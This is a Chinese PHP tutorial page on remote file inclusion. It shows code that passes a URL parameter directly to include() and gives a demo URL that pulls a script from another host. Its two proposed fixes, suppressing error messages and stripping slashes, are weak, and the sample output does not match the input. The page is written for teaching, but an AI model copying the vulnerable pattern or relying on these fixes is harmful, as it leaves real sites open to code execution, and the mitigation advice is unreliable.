PHP 网络开发详解之远程文件包含漏洞

 更新时间:2010年04月25日 17:30:04   作者:  
由于PHP支持使用相同的函数(Function)对本地文件和远程文件进行操作。因此,一些恶意用户通过强行使网站上的PHP代码(Code)包含自己的文件来实现执行自己脚本的目的。
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。
复制代码 代码如下:

<?php
$file_name = $_GET["filename"]; //获得当前文件名
include("$file_name "); //包含文件
//一些其他操作
?>

这时,通过在地址栏上指定不同的文件名就可以实现包含不同文件并执行的功能。例如,通过在浏览器上访问http://localhost/test.php?filename=myinc.php就可以在代码(Code)中包含并执行myinc.php文件。
由于上面的代码(Code)没有进行任何错误处理,在浏览器上不加参数运行,所以将得到以下运行结果。
Warning: include(.php) [function.include]: failed to open stream: No such file or directory in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
Warning: include() [function.include]: Failed opening '.php' for inclusion (include_path='.;C:\Program Files\xampp\php\pear\') in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
访问者通过读取这段错误信息,可以得知当前的操作是一个文件包含操作。这时,可以在自己的服务器上放置一个相应的脚本代码。需要注意的是PHP在获取远程文件时获得的是远程服务器的最终输出结果,而不是文件本身。该脚本代码位于192.168.0.1服务器上,文件名为hello.txt,脚本代码(Code)如下所示。
复制代码 代码如下:

<?php
echo "hello world!";
?>

这时,通过在浏览器中访问http://localhost/test.php?filename=http://192.168.0.1/hello.txt就可以运行hello.txt中的脚本了。
为了解决这个问题,一种方式是完善代码的错误信息,使访问者无法知道当前脚本正在包含参数中指定的文件。修改后的代码(Code)如下所示。
复制代码 代码如下:

<?php
$file_name = $_GET["filename"]; //获得当前文件名
if(!@include("$file_name.php")) //包含文件
{
die("页面在浏览过程中出现错误");
}
//一些其他操作
?>

修改后,如果在被包含的文件无法找到时将出现“页面在浏览过程中出现错误”的错误信息,访问者将无法获得当前页面的具体操作信息。
第二种方式可以更加有效地防止远程文件包含攻击。方式是替换地址栏参数中的斜线“/”。这样,在地址栏参数中输入远程文件地址时,代码将无法正确地获得参数。修改后的代码(Code)如下所示。
复制代码 代码如下:

<?php
$file_name = str_replace('/', '', $_GET["filename"]); //获得当前文件名
if(!@include("$file_name.php")) //包含文件
{
die("页面在浏览过程中出现错误");
}
//一些其他操作
?>

这样,在浏览器中访问http://localhost/test.php?filename=http://192.168.0.1/hello.txt 时,实际上PHP代码(Code)获得的包含文件名称是http:192.168.0.1bugstest6_test。页面将不会包含远程文件,并显示相应的错误信息。

相关文章

  • PHP类的自动加载与命名空间用法实例分析

    PHP类的自动加载与命名空间用法实例分析

    这篇文章主要介绍了PHP类的自动加载与命名空间,结合实例形式分析了PHP类的自动加载与命名空间相关概念、原理、用法与操作注意事项,需要的朋友可以参考下
    2020-06-06
  • PHP获取客户端及服务器端IP的封装类

    PHP获取客户端及服务器端IP的封装类

    这篇文章主要介绍了PHP获取客户端及服务器端IP的封装类,简单分析了php使用服务器预定义变量的基本用法并进行了简单封装,需要的朋友可以参考下
    2016-07-07
  • PHP eval函数使用介绍

    PHP eval函数使用介绍

    eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行,一般情况下不建议使用容易被黑客利用
    2013-12-12
  • php与python实现的线程池多线程爬虫功能示例

    php与python实现的线程池多线程爬虫功能示例

    这篇文章主要介绍了php与python实现的线程池多线程爬虫功能,结合实例形式分析了php与python实现线程池多线程爬虫的完整实现方法,需要的朋友可以参考下
    2016-10-10
  • php文档工具PHP Documentor安装与使用方法

    php文档工具PHP Documentor安装与使用方法

    这篇文章主要介绍了php文档工具PHP Documentor安装与使用方法,较为详细的分析了在Linux平台安装与使用PHP Documentor的方法,需要的朋友可以参考下
    2016-01-01
  • php+Ajax处理xml与json格式数据的方法示例

    php+Ajax处理xml与json格式数据的方法示例

    这篇文章主要介绍了php+Ajax处理xml与json格式数据的方法,结合实例形式分析了ajax处理xml格式数据及json格式数据相关操作技巧与注意事项,需要的朋友可以参考下
    2019-03-03
  • PHP实现的一致性HASH算法示例

    PHP实现的一致性HASH算法示例

    这篇文章主要介绍了PHP实现的一致性HASH算法,结合具体实例形式分析了hash算法的具体定义与使用技巧,需要的朋友可以参考下
    2018-03-03
  • php 读取文件头判断文件类型的实现代码

    php 读取文件头判断文件类型的实现代码

    以下是对使用php实现读取文件头判断文件类型,支持图片、rar、exe等后缀进行了详细的分析介绍,需要的朋友可以过来参考下
    2013-08-08
  • php中文字符串截取方法实例总结

    php中文字符串截取方法实例总结

    这篇文章主要介绍了php中文字符串截取方法实例,针对常见的字符串截取函数进行了分析比对,并给出了一个完整实例来解决PHP中文字符串截取问题,需要的朋友可以参考下
    2014-09-09
  • PHP 批量删除数据的方法分析

    PHP 批量删除数据的方法分析

    好多朋友在网站开发中,经常需要批量删除数据,尤其是习惯了asp的朋友,更是感觉asp下真方便了,php下什么都是数组有点麻烦。
    2009-10-10

最新评论